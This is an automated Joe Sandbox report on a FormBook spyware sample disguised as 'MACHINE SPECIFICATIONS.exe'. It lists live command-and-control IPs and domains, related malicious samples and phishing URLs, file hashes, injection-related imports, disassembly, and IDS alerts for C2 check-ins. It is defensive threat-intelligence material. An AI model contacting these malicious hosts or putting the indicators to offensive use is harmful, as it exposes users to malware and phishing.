https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	RAVCpl64.exe, 00000003.00000002.111799235023.0000000007504000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110846670011.0000000006400000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000004.00000002.110845588280.0000000004124000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000005.00000002.107574891892.000000000CBC4000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.9.94.86	www.milp.store	Sweden	39570	LOOPIASE	true
160.25.166.123	www.rpa.asia	unknown	17676	GIGAINFRASoftbankBBCorpJP	true
104.21.16.1	www.mzkd6gp5.top	United States	13335	CLOUDFLARENETUS	true
13.248.169.48	www.bonheur.tech	United States	16509	AMAZON-02US	true
103.106.67.112	www.furrcali.xyz	New Zealand	56030	VOYAGERNET-AS-APVoyagerInternetLtdNZ	true
104.21.112.1	www.buyspeechst.shop	United States	13335	CLOUDFLARENETUS	true
199.192.21.169	www.bokus.site	United States	22612	NAMECHEAP-NETUS	true
47.83.1.90	www.lejgnu.info	United States	3209	VODANETInternationalIP-BackboneofVodafoneDE	true
172.67.132.227	www.ogbos88.cyou	United States	13335	CLOUDFLARENETUS	true
202.95.11.110	www.mirenzhibo.net	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true
45.56.79.23	www.chiro.live	United States	63949	LINODE-APLinodeLLCUS	true
136.243.64.147	100millionjobs.africa	Germany	24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589904
Start date and time:	2025-01-13 10:17:54 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	MACHINE SPECIFICATIONS.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/1@17/12
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 57 Number of non-executed functions: 225
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe

Simulations

Behavior and APIs

Time	Type	Description
04:21:33	API Interceptor	27674831x Sleep call for process: cmdkey.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.86	YKzxWyqI6Y.exe	Get hash	malicious	FormBook	Browse	www.myndighetssupport.org/2k8x/
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.milp.store/oqbp/
	new.exe	Get hash	malicious	FormBook	Browse	www.milp.store/2j93/
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.milp.store/2j93/
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	www.deeplungatlas.org/57zf/
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	P1 HWT623ATG.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.torentreprenad.com/r45o/
	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	Doc PI.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
160.25.166.123	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/74m3/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/bwjl/
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	www.rpa.asia/ggyo/
104.21.16.1	1001-13.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/utww/
	trow.exe	Get hash	malicious	Unknown	Browse	www.wifi4all.nl/
	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	www.rafconstrutora.online/0xli/
	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.kkpmoneysocial.top/86am/
	JNKHlxGvw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.rpa.asia	gH3LlhcRzg.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	160.25.166.123
www.lejgnu.info	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	47.83.1.90
www.mirenzhibo.net	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	rQuotation.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
www.milp.store	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
www.bonheur.tech	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	76.223.54.146
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	76.223.54.146
www.furrcali.xyz	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	rQuotation.exe	Get hash	malicious	FormBook	Browse	103.106.67.112
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	103.106.67.112

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GIGAINFRASoftbankBBCorpJP	4.elf	Get hash	malicious	Unknown	Browse	126.27.223.219
	6.elf	Get hash	malicious	Unknown	Browse	126.139.28.99
	3.elf	Get hash	malicious	Unknown	Browse	220.12.230.107
	res.sh4.elf	Get hash	malicious	Unknown	Browse	60.135.86.149
	res.ppc.elf	Get hash	malicious	Unknown	Browse	219.192.35.98
	res.m68k.elf	Get hash	malicious	Unknown	Browse	60.152.22.183
	res.arm5.elf	Get hash	malicious	Unknown	Browse	126.109.127.5
	3.elf	Get hash	malicious	Unknown	Browse	126.245.168.155
	res.x86.elf	Get hash	malicious	Unknown	Browse	60.84.87.154
	6.elf	Get hash	malicious	Unknown	Browse	60.78.199.141
CLOUDFLARENETUS	Payment Notification Confirmation Documents 09_01_2025 Paper bill.exe	Get hash	malicious	FormBook	Browse	104.21.13.141
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	invnoIL438805.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	g6.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://communication.investecprivatebank.co.za/Marketing/DocFusion/Headers/PBHeaderBanner.jpg	Get hash	malicious	Unknown	Browse	104.21.96.1
	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	g3.elf	Get hash	malicious	Unknown	Browse	1.1.1.1
LOOPIASE	YKzxWyqI6Y.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
AMAZON-02US	3.elf	Get hash	malicious	Unknown	Browse	108.150.20.184
	Client-base.exe	Get hash	malicious	Quasar	Browse	3.6.231.193
	CSZ inquiry for MH raw material.exe	Get hash	malicious	FormBook	Browse	18.139.62.226
	arm5.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	trow.exe	Get hash	malicious	Unknown	Browse	3.65.101.129
	https://link.mail.beehiiv.com/ss/c/u001.dSnm3kaGd0BkNqLYPjeMfxWXllAYaBQ5sAn4OVD0j89GQGPZtwQlLugE_8c0wQMKfkpy5_wJ66BvE1Ognfzf5MlQMAeZ1qYs5mgwUBu3TAc6279Q43ISHz-HkVRC08yeDA4QvKWsqLTI1us9a0eXx18qeAibsZhjMMPvES-iG2zoVABKcwKIVWyx95VTVcFMSh6AEN3OCUfP_rXFvjKRbIPMuhn_dqYr8yUBKJvhhlJR9FhTpZPAULxzMbsYWp8k/4cu/JfECY1HwRl-ipvrNOktVcw/h23/h001.ibQl2N4tDD79TTzErix_sFWEGLTTuM6dTVMrTg3y5Dk	Get hash	malicious	Unknown	Browse	18.245.46.55
	https://mrohailkhan.com/energyaustralia/auth/auhs1/	Get hash	malicious	Unknown	Browse	3.163.248.4
	https://app-nadexlxogi.webflow.io/	Get hash	malicious	Unknown	Browse	18.244.20.221
	https://upholl-xlognusa.godaddysites.com/	Get hash	malicious	Unknown	Browse	13.248.243.5
	https://informed.deliveryerz.top/us/	Get hash	malicious	Unknown	Browse	99.86.8.175

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\b427-I_1

Download File

Process:	C:\Windows\SysWOW64\cmdkey.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	135168
Entropy (8bit):	1.1142956103012707
Encrypted:	false
SSDEEP:	192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
MD5:	E3F9717F45BF5FFD0A761794A10A5BB5
SHA1:	EBD823E350F725F29A7DE7971CD35D8C9A5616CC
SHA-256:	D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
SHA-512:	F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.5400853145125675
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	MACHINE SPECIFICATIONS.exe
File size:	600'576 bytes
MD5:	0821050b53dd0b7df1bdfb5239b0df48
SHA1:	6473c5ca92d00908e32978efc2a3a612db228dfe
SHA256:	cea3caf646f24876d9a4ad1e9c2501660f85b804c0931e9ae520f4c6841f21b3
SHA512:	df8869dbf4820fb21cd28df5d9a9c9d53d01fab5250bce5752d19b7e311efece1bc3496ea9540e18bd2b34e573a71d5ca54445ad34ceb792e0384def6f45d6c5
SSDEEP:	12288:X3IzS3g8FT0yl618l+tUOl6iLrnDins4stVL9Ju3X3u+:X3Iu7T0y8y8dT+nrs/63X39
TLSH:	B6D4F05E3A5989EDD0B5903540B31618F774BCB22B686F8787147E261F33AC4AD3EB12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........................9...........................................................7.......7.......Rich....................PE..d..

File Icon


Icon Hash:	333333ab693b9b98

Static PE Info

General

Entrypoint:	0x14000607c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x678442D1 [Sun Jan 12 22:31:45 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	a4337853399c6dd6b5b8d71064a5db03

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F50B0C0C2D4h
dec eax
add esp, 28h
jmp 00007F50B0C0BA77h
int3
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F50B0C0B41Fh
dec eax
lea edx, dword ptr [0001A0D3h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F50B0C0C4EEh
int3
dec eax
sub esp, 48h
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F50B0C09297h
dec eax
lea edx, dword ptr [00019FC3h]
dec eax
lea ecx, dword ptr [esp+20h]
call 00007F50B0C0C4CEh
int3
jmp 00007F50B0C12750h
int3
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
inc ecx
xor ecx, 756E6547h
mov dword ptr [ebp-0Ch], ebx
inc ebp
or edx, ecx
mov dword ptr [ebp-08h], ecx
mov edi, ecx
mov dword ptr [ebp-04h], edx
jne 00007F50B0C0BC5Dh
dec eax
or dword ptr [0001AF65h], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [0000004Dh], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2029c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6e000	0x29492	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x23000	0x177c	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x26000	0x690	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1e360	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1e220	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x16000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14f46	0x15000	067e50a34220f041ee0f764aa849fff9	False	0.5220307849702381	data	6.288061474044464	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x16000	0xabce	0xac00	e8882ba5a4fcda1c9a1b6d93a6b6f4f7	False	0.40954305959302323	data	4.832676618302265	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x21000	0x1d34	0xc00	d3a2a7a4696f64ce18a7a1ec04d07ffd	False	0.15494791666666666	DOS executable (block device driver)	2.242109030306984	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x23000	0x177c	0x1800	106b6e2b13da1bba06d757cfde96fb6c	False	0.4674479166666667	data	4.938286799578931	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fptable	0x25000	0x100	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x26000	0x690	0x800	c0070de9dae067a642c53c8b5cac34cc	False	0.51806640625	data	4.967588331200913	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.stub	0x27000	0x47000	0x46600	1c189850ea7d0f59b896a9582cd1d138	False	0.9830463199378331	data	7.9947314432700844	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x6e000	0x29492	0x29600	c96082b44a8884136a5b0b0a2c02b283	False	0.676778464879154	data	7.090068333492356	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x6e1a4	0x10d8b	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9989130907351854
RT_ICON	0x7ef30	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.42335561339169525
RT_ICON	0x8f758	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.5058455361360416
RT_ICON	0x93980	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.5346473029045643
RT_ICON	0x95f28	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.6055347091932458
RT_ICON	0x96fd0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7225177304964538
RT_GROUP_ICON	0x97438	0x5a	Targa image data - Map 32 x 3467 x 1 +1	0.7777777777777778

Imports

DLL

Import

ntdll.dll

RtlPcToFileHeader, RtlUnwindEx, NtResumeThread, NtSetContextThread, NtGetContextThread, NtWriteVirtualMemory, NtFreeVirtualMemory, NtAllocateVirtualMemory

KERNEL32.dll

WriteFile, SetFilePointerEx, GetConsoleMode, WriteConsoleW, CloseHandle, TerminateProcess, CreateProcessA, GetModuleHandleA, GetProcAddress, FreeConsole, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetModuleHandleW, GetCurrentProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, RaiseException, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, GetStdHandle, HeapSize, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, VirtualProtect, CompareStringW, LCMapStringW, GetProcessHeap, GetFileType, SetStdHandle, GetStringTypeW, CreateFileW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T10:19:54.471695+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49793	160.25.166.123	80	TCP
2025-01-13T10:21:10.784518+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49770	194.9.94.86	80	TCP
2025-01-13T10:21:26.293640+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49771	45.56.79.23	80	TCP
2025-01-13T10:21:28.950307+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49772	45.56.79.23	80	TCP
2025-01-13T10:21:31.607688+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49773	45.56.79.23	80	TCP
2025-01-13T10:21:34.260733+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49774	45.56.79.23	80	TCP
2025-01-13T10:21:40.593848+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49775	104.21.16.1	80	TCP
2025-01-13T10:21:43.225878+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49776	104.21.16.1	80	TCP
2025-01-13T10:21:45.844950+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49777	104.21.16.1	80	TCP
2025-01-13T10:21:48.457776+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49778	104.21.16.1	80	TCP
2025-01-13T10:21:53.931273+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49779	199.192.21.169	80	TCP
2025-01-13T10:21:56.615001+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49780	199.192.21.169	80	TCP
2025-01-13T10:21:59.309282+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49781	199.192.21.169	80	TCP
2025-01-13T10:22:01.991542+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49782	199.192.21.169	80	TCP
2025-01-13T10:22:16.862551+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49783	47.83.1.90	80	TCP
2025-01-13T10:22:19.705027+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49784	47.83.1.90	80	TCP
2025-01-13T10:22:22.561507+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49785	47.83.1.90	80	TCP
2025-01-13T10:22:25.411305+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49786	47.83.1.90	80	TCP
2025-01-13T10:22:31.750087+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49787	13.248.169.48	80	TCP
2025-01-13T10:22:34.379787+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49788	13.248.169.48	80	TCP
2025-01-13T10:22:37.016801+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49789	13.248.169.48	80	TCP
2025-01-13T10:22:39.642392+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49790	13.248.169.48	80	TCP
2025-01-13T10:22:46.117946+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49791	160.25.166.123	80	TCP
2025-01-13T10:22:48.986719+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49792	160.25.166.123	80	TCP
2025-01-13T10:22:54.776354+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49794	160.25.166.123	80	TCP
2025-01-13T10:23:00.124357+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49795	172.67.132.227	80	TCP
2025-01-13T10:23:02.754208+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49796	172.67.132.227	80	TCP
2025-01-13T10:23:05.372842+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49797	172.67.132.227	80	TCP
2025-01-13T10:23:08.002062+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49798	172.67.132.227	80	TCP
2025-01-13T10:23:22.252180+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49799	136.243.64.147	80	TCP
2025-01-13T10:23:24.972634+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49800	136.243.64.147	80	TCP
2025-01-13T10:23:27.691749+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49801	136.243.64.147	80	TCP
2025-01-13T10:23:30.407723+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49802	136.243.64.147	80	TCP
2025-01-13T10:23:41.712888+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49803	202.95.11.110	80	TCP
2025-01-13T10:23:44.565061+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49804	202.95.11.110	80	TCP
2025-01-13T10:23:47.406182+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49805	202.95.11.110	80	TCP
2025-01-13T10:23:50.594776+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49806	202.95.11.110	80	TCP
2025-01-13T10:23:56.084219+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49807	13.248.169.48	80	TCP
2025-01-13T10:23:58.715932+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49808	13.248.169.48	80	TCP
2025-01-13T10:24:02.353713+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49809	13.248.169.48	80	TCP
2025-01-13T10:24:05.991065+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49810	13.248.169.48	80	TCP
2025-01-13T10:24:11.690682+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49811	103.106.67.112	80	TCP
2025-01-13T10:24:14.386534+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49812	103.106.67.112	80	TCP
2025-01-13T10:24:17.070141+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49813	103.106.67.112	80	TCP
2025-01-13T10:24:19.758752+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49814	103.106.67.112	80	TCP
2025-01-13T10:24:25.243442+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49815	104.21.112.1	80	TCP
